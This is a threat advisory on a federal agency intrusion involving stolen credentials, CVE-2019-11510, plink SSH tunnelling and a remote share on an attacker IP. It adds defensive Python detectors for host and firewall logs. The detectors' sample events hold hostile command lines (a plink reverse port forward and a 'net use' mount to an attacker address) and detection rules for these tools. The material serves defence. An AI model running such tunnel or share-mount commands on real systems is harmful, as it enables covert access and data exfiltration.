Rewterz Threat Advisory -ICS: B&R Automation SiteManager and GateManager
October 1, 2020
Rewterz Threat Alert – Nanocore RAT – IOCs
October 1, 2020
Severity
High
Analysis Summary
A network compromise has been reported on a federal agency's enterprise network in which the threat actor held valid credentials for multiple users' Microsoft Office 365 (O365) accounts and for domain administrator accounts, and used those credentials for initial access. The actor first logged into a user's O365 account, browsed pages on a SharePoint site and downloaded a file. The actor also connected several times over Transmission Control Protocol (TCP) to the agency's virtual private network (VPN) server. The credentials may have been obtained from an unpatched agency VPN server by exploiting a known vulnerability in Pulse Secure (Pulse Connect Secure), CVE-2019-11510, which is already being widely exploited; the source of the credentials has not been confirmed.
After initial access, the actor logged into an agency O365 email account and viewed and downloaded help desk email attachments with "Intranet access" and "VPN passwords" in the subject line, despite already holding privileged access. (Note: these emails did not contain any passwords.) The actor logged into the same account via Remote Desktop Protocol (RDP), enumerated Active Directory and the Group Policy key, and changed a registry key for Group Policy. Immediately afterward, the actor used common Microsoft Windows command-line tools (conhost, ipconfig, net, query, netstat, ping and whoami), together with plink.exe, to enumerate the compromised system and network.
The actor then made repeated attempts to connect to a virtual private server (VPS) through the Windows Server Message Block (SMB) client. Although the connection was established and dropped several times, it was ultimately successful. During the same period, the actor used an alias secure identifier account they had previously created to log into the VPS via an SMB share, and then executed plink.exe on a victim file server.
The actor established Persistence and Command and Control on the victim network by creating a persistent Secure Shell (SSH) tunnel and reverse SOCKS proxy, by running inetinfo.exe (a unique, multi-stage malware used to drop files; the name mimics the legitimate IIS process binary), and by mounting a remote share on IP address 78.27.70[.]237 locally. The mounted share allowed the actor to move files freely during the operation while leaving fewer artifacts for forensic analysis. The actor also created a local account, which was used for data Collection and Exfiltration as well as for Persistence and Command and Control.
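The script below is an added example, not tooling from the Rewterz or CISA advisory, that runs three host-side checks over process-creation events shaped like Sysmon Event ID 1 exported to JSON (the field names and the sample events are constructed assumptions): plink.exe invoked with a port-forwarding flag (the SSH tunnel / reverse SOCKS proxy), a burst of the discovery commands listed above from a single host and user, and a `net use` that mounts a share on a public or IOC-listed IP address. The `-pw` heuristic catches a renamed plink binary; where Sysmon is available, the OriginalFileName field is a more robust check.

```python
"""Host-side detections for the intrusion chain described above: plink.exe
port forwarding, a discovery-command burst, and mounting a share hosted on
external attacker infrastructure. Added example over constructed events;
not CISA's or Rewterz's tooling. Event field names are assumptions."""
import re
import shlex
from datetime import datetime, timedelta
from ipaddress import ip_address

# Attacker IPs from the advisory, re-fanged so ipaddress can parse them.
IOC_IPS = {"91.219.236.166", "185.86.151.223", "207.220.1.3",
           "185.193.127.18", "78.27.70.237"}
DISCOVERY_CMDS = {"ipconfig", "net", "query", "netstat", "ping", "whoami"}
DISCOVERY_THRESHOLD = 4                  # distinct tools by one host/user ...
DISCOVERY_WINDOW = timedelta(minutes=5)  # ... inside this window
FORWARD_FLAGS = {"-R", "-D", "-L"}       # plink: remote, dynamic (SOCKS), local forward
UNC_RE = re.compile(r"\\\\([^\\\s]+)")   # host part of \\host\share

# Constructed sample: (time, host, user, image path, command line).
_RAW = [
    ("10:00:05", "FILESRV01", "CORP\\jdoe", "C:\\Windows\\System32\\ipconfig.exe", "ipconfig /all"),
    ("10:00:09", "FILESRV01", "CORP\\jdoe", "C:\\Windows\\System32\\whoami.exe", "whoami /priv"),
    ("10:00:12", "FILESRV01", "CORP\\jdoe", "C:\\Windows\\System32\\net.exe", 'net group "Domain Admins" /domain'),
    ("10:00:20", "FILESRV01", "CORP\\jdoe", "C:\\Windows\\System32\\netstat.exe", "netstat -ano"),
    ("10:00:31", "FILESRV01", "CORP\\jdoe", "C:\\Windows\\System32\\ping.exe", "ping -n 1 10.0.0.5"),
    ("10:01:10", "FILESRV01", "CORP\\jdoe", "C:\\Users\\jdoe\\AppData\\Local\\Temp\\plink.exe",
     "plink.exe -N -R 8443:127.0.0.1:3389 -pw hunter2 root@78.27.70.237"),
    ("10:02:00", "FILESRV01", "CORP\\jdoe", "C:\\Windows\\System32\\net.exe",
     "net use X: \\\\78.27.70.237\\share /user:svc P@ss"),
    ("10:05:00", "WKSTN07", "CORP\\asmith", "C:\\Windows\\System32\\net.exe",
     "net use H: \\\\fileserver.corp.local\\home"),
]
SAMPLE_EVENTS = [dict(ts=f"2020-09-24T{t}", host=h, user=u, image=i, cmd=c)
                 for t, h, u, i, c in _RAW]


def exe_name(event):
    """Lower-case image basename without .exe, e.g. 'net', 'plink'."""
    return re.sub(r"\.exe$", "", re.split(r"[\\/]", event["image"])[-1].lower())


def tokens(event):
    """Split a Windows command line without treating backslashes as escapes."""
    try:
        parts = shlex.split(event["cmd"], posix=False)
    except ValueError:                       # unbalanced quote: fall back to whitespace
        parts = event["cmd"].split()
    return [p.strip('"') for p in parts]


def finding(rule, event, detail):
    return {"rule": rule, "host": event["host"], "user": event["user"], "detail": detail}


def detect_port_forward(event):
    """plink.exe, or a renamed binary still using plink's -pw flag, with a
    forwarding flag: the SSH tunnel / reverse SOCKS proxy from the advisory."""
    args = tokens(event)
    flags = FORWARD_FLAGS.intersection(args)
    if exe_name(event) != "plink" and not (flags and "-pw" in args):
        return None
    remote = next((a.rsplit("@", 1)[-1] for a in args if "@" in a), "?")
    tag = " (advisory IOC)" if remote in IOC_IPS else ""
    return finding("ssh_port_forward", event,
                   f"{exe_name(event)} {' '.join(sorted(flags))} to {remote}{tag}")


def detect_external_share(event):
    """'net use' against a share hosted on a public or known-bad IP."""
    args = tokens(event)
    m = UNC_RE.search(event["cmd"])
    if exe_name(event) != "net" or "use" not in args or not m:
        return None
    try:
        ip = ip_address(m.group(1))
    except ValueError:                       # hostname: resolve before judging; skipped here
        return None
    if str(ip) in IOC_IPS or ip.is_global:
        return finding("external_share_mount", event, f"\\\\{ip} mounted by net use")
    return None


def detect_discovery_burst(events):
    """At least DISCOVERY_THRESHOLD distinct discovery tools run by one
    host/user inside DISCOVERY_WINDOW: the enumeration pattern above."""
    per_actor = {}
    for e in events:
        if exe_name(e) in DISCOVERY_CMDS:
            per_actor.setdefault((e["host"], e["user"]), []).append(
                (datetime.fromisoformat(e["ts"]), exe_name(e)))
    out = []
    for (host, user), seq in per_actor.items():
        seq.sort()
        for i, (start, _) in enumerate(seq):
            seen = {name for ts, name in seq[i:] if ts - start <= DISCOVERY_WINDOW}
            if len(seen) >= DISCOVERY_THRESHOLD:
                out.append({"rule": "discovery_burst", "host": host, "user": user,
                            "detail": f"{len(seen)} tools: {', '.join(sorted(seen))}"})
                break                        # one finding per actor
    return out


def analyze(events):
    found = [f for e in events for det in (detect_port_forward, detect_external_share)
             if (f := det(e))]
    return found + detect_discovery_burst(events)


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

Run against the constructed events it reports all three rules for jdoe on FILESRV01 and nothing for the workstation user whose `net use` targets an internal hostname; the hostname case is deliberately skipped rather than guessed, since only DNS resolution can say whether it points outside the network.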
Impact
- Privilege Abuse
- Data Manipulation
- Data Exfiltration
- Information Theft
Indicators of Compromise
Source IP
- 91[.]219[.]236[.]166
- 185[.]86[.]151[.]223
- 207[.]220[.]1[.]3
- 185[.]193[.]127[.]18
- 78[.]27[.]70[.]237
Remediation
- Block the threat indicators at their respective controls.
- Enable multi-factor authentication for all accounts to avoid unauthorized use of stolen credentials.
- Patch all known vulnerabilities as soon as updates are available, prioritizing internet-facing VPN appliances such as those affected by CVE-2019-11510.
- Monitor network traffic for unusual activity such as unexpected open ports, large outbound transfers, and unexpected or unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).
- Implement the principle of least privilege on data access.
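The following script is an added example, not part of the Rewterz advisory, that turns the monitoring and blocking items above into checks over firewall flow logs: it flags any flow to the listed IOC IPs (allowed or denied), any allowed outbound SSH, SMB or RDP connection to a public address, and any source/destination pair whose total outbound volume exceeds a threshold. The key=value log format, the sample lines and the 50 MiB threshold are constructed assumptions to be adapted to the environment.

```python
"""Network-side checks for the remediation list: connections to the advisory's
IOC IPs, outbound SSH/SMB/RDP to the internet, and unusually large outbound
transfers, evaluated over firewall flow logs. Added example; the key=value
log format, sample lines and threshold are constructed assumptions."""
import re
from collections import defaultdict
from ipaddress import ip_address

IOC_IPS = {"91.219.236.166", "185.86.151.223", "207.220.1.3",
           "185.193.127.18", "78.27.70.237"}
ADMIN_PORTS = {22: "ssh", 445: "smb", 3389: "rdp"}   # should not leave the perimeter
LARGE_OUTBOUND_BYTES = 50 * 1024 * 1024              # per src/dst pair; tune per environment
KV_RE = re.compile(r"(\w+)=(\S+)")

# Constructed sample: one flow per line, timestamp followed by key=value pairs.
SAMPLE_LOG = """\
2020-09-24T09:58:02 src=10.0.0.15 dst=142.250.74.36 proto=tcp dport=443 bytes_out=18203 action=allow
2020-09-24T10:01:12 src=10.0.0.15 dst=78.27.70.237 proto=tcp dport=445 bytes_out=4096 action=allow
2020-09-24T10:03:40 src=10.0.0.15 dst=91.219.236.166 proto=tcp dport=22 bytes_out=2048 action=allow
2020-09-24T10:10:05 src=10.0.0.15 dst=91.219.236.166 proto=tcp dport=22 bytes_out=83886080 action=allow
2020-09-24T10:12:30 src=10.0.0.22 dst=10.0.0.5 proto=tcp dport=445 bytes_out=1048576 action=allow
2020-09-24T10:15:01 src=10.0.0.22 dst=93.184.216.34 proto=tcp dport=3389 bytes_out=512 action=allow
2020-09-24T10:20:00 src=10.0.0.22 dst=93.184.216.34 proto=tcp dport=3389 bytes_out=256 action=deny
"""


def parse_line(line):
    """Timestamp, then key=value fields; dport and bytes_out become ints."""
    ts, _, rest = line.partition(" ")
    rec = {"ts": ts, **dict(KV_RE.findall(rest))}
    rec["dport"] = int(rec["dport"])
    rec["bytes_out"] = int(rec.get("bytes_out", 0))
    return rec


def check_flow(rec):
    """Per-flow rules. Returns a list of (rule, detail) pairs, empty if benign."""
    dst = ip_address(rec["dst"])
    where = f"{rec['src']} -> {dst}:{rec['dport']} ({rec['action']})"
    hits = []
    if str(dst) in IOC_IPS:                  # an IOC hit matters even if the firewall denied it
        hits.append(("ioc_destination", where))
    if dst.is_global and rec["dport"] in ADMIN_PORTS and rec["action"] == "allow":
        hits.append((f"outbound_{ADMIN_PORTS[rec['dport']]}", where))
    return hits


def analyze_log(text):
    records = [parse_line(l) for l in text.splitlines() if l.strip()]
    findings = [{"rule": rule, "ts": r["ts"], "detail": d}
                for r in records for rule, d in check_flow(r)]
    # Volume rule: total bytes sent to each external destination across the log.
    volume = defaultdict(int)
    for r in records:
        if ip_address(r["dst"]).is_global:
            volume[(r["src"], r["dst"])] += r["bytes_out"]
    for (src, dst), total in sorted(volume.items()):
        if total >= LARGE_OUTBOUND_BYTES:
            findings.append({"rule": "large_outbound", "ts": None,
                             "detail": f"{src} -> {dst}: {total} bytes"})
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["rule"], f["detail"])
```

The internal SMB flow to 10.0.0.5 produces nothing, which is the point of the `is_global` test: SMB, SSH and RDP are normal inside the network and suspicious only when they cross the perimeter. Denied flows to IOC addresses are still reported, because a blocked beacon still identifies a host worth triaging.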